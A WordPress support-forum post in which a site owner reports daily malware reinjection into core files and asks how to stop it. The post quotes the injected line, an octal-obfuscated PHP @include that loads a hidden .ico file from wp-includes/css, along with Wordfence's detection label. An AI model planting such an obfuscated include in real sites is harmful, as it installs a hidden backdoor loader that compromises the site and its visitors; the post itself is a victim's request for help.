• Resolved designer13421321

    (@nistuj817)


    Just about every day, I get alerts on core WordPress files being modified in such a way. Random text like this: @include “\057/hom\145/cle\141rbel\151efs7\057publ\151c_ht\155l/wp\055incl\165des/\143ss/.\070a14b\07061.i\143o”;
    is inserted into the index.php, wp-config, and wp-settings.php files. Also some files like wp-includes/css/.8a14b861.ico are generated. I go through every day and restore these files back to normal, but it KEEPS HAPPENING. It’s so annoying and I need to prevent this once and for all.

    Wordfence says: The infection type is: Suspicious:PHP/obfuicoinclude
    Description: Suspicious code often added by attackers

    I’ve gotten all plugins and themes up to date, and even added define(‘DISALLOW_FILE_EDIT’, true); in the wp-config file. Help!

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Suspicious code’ is closed to new replies.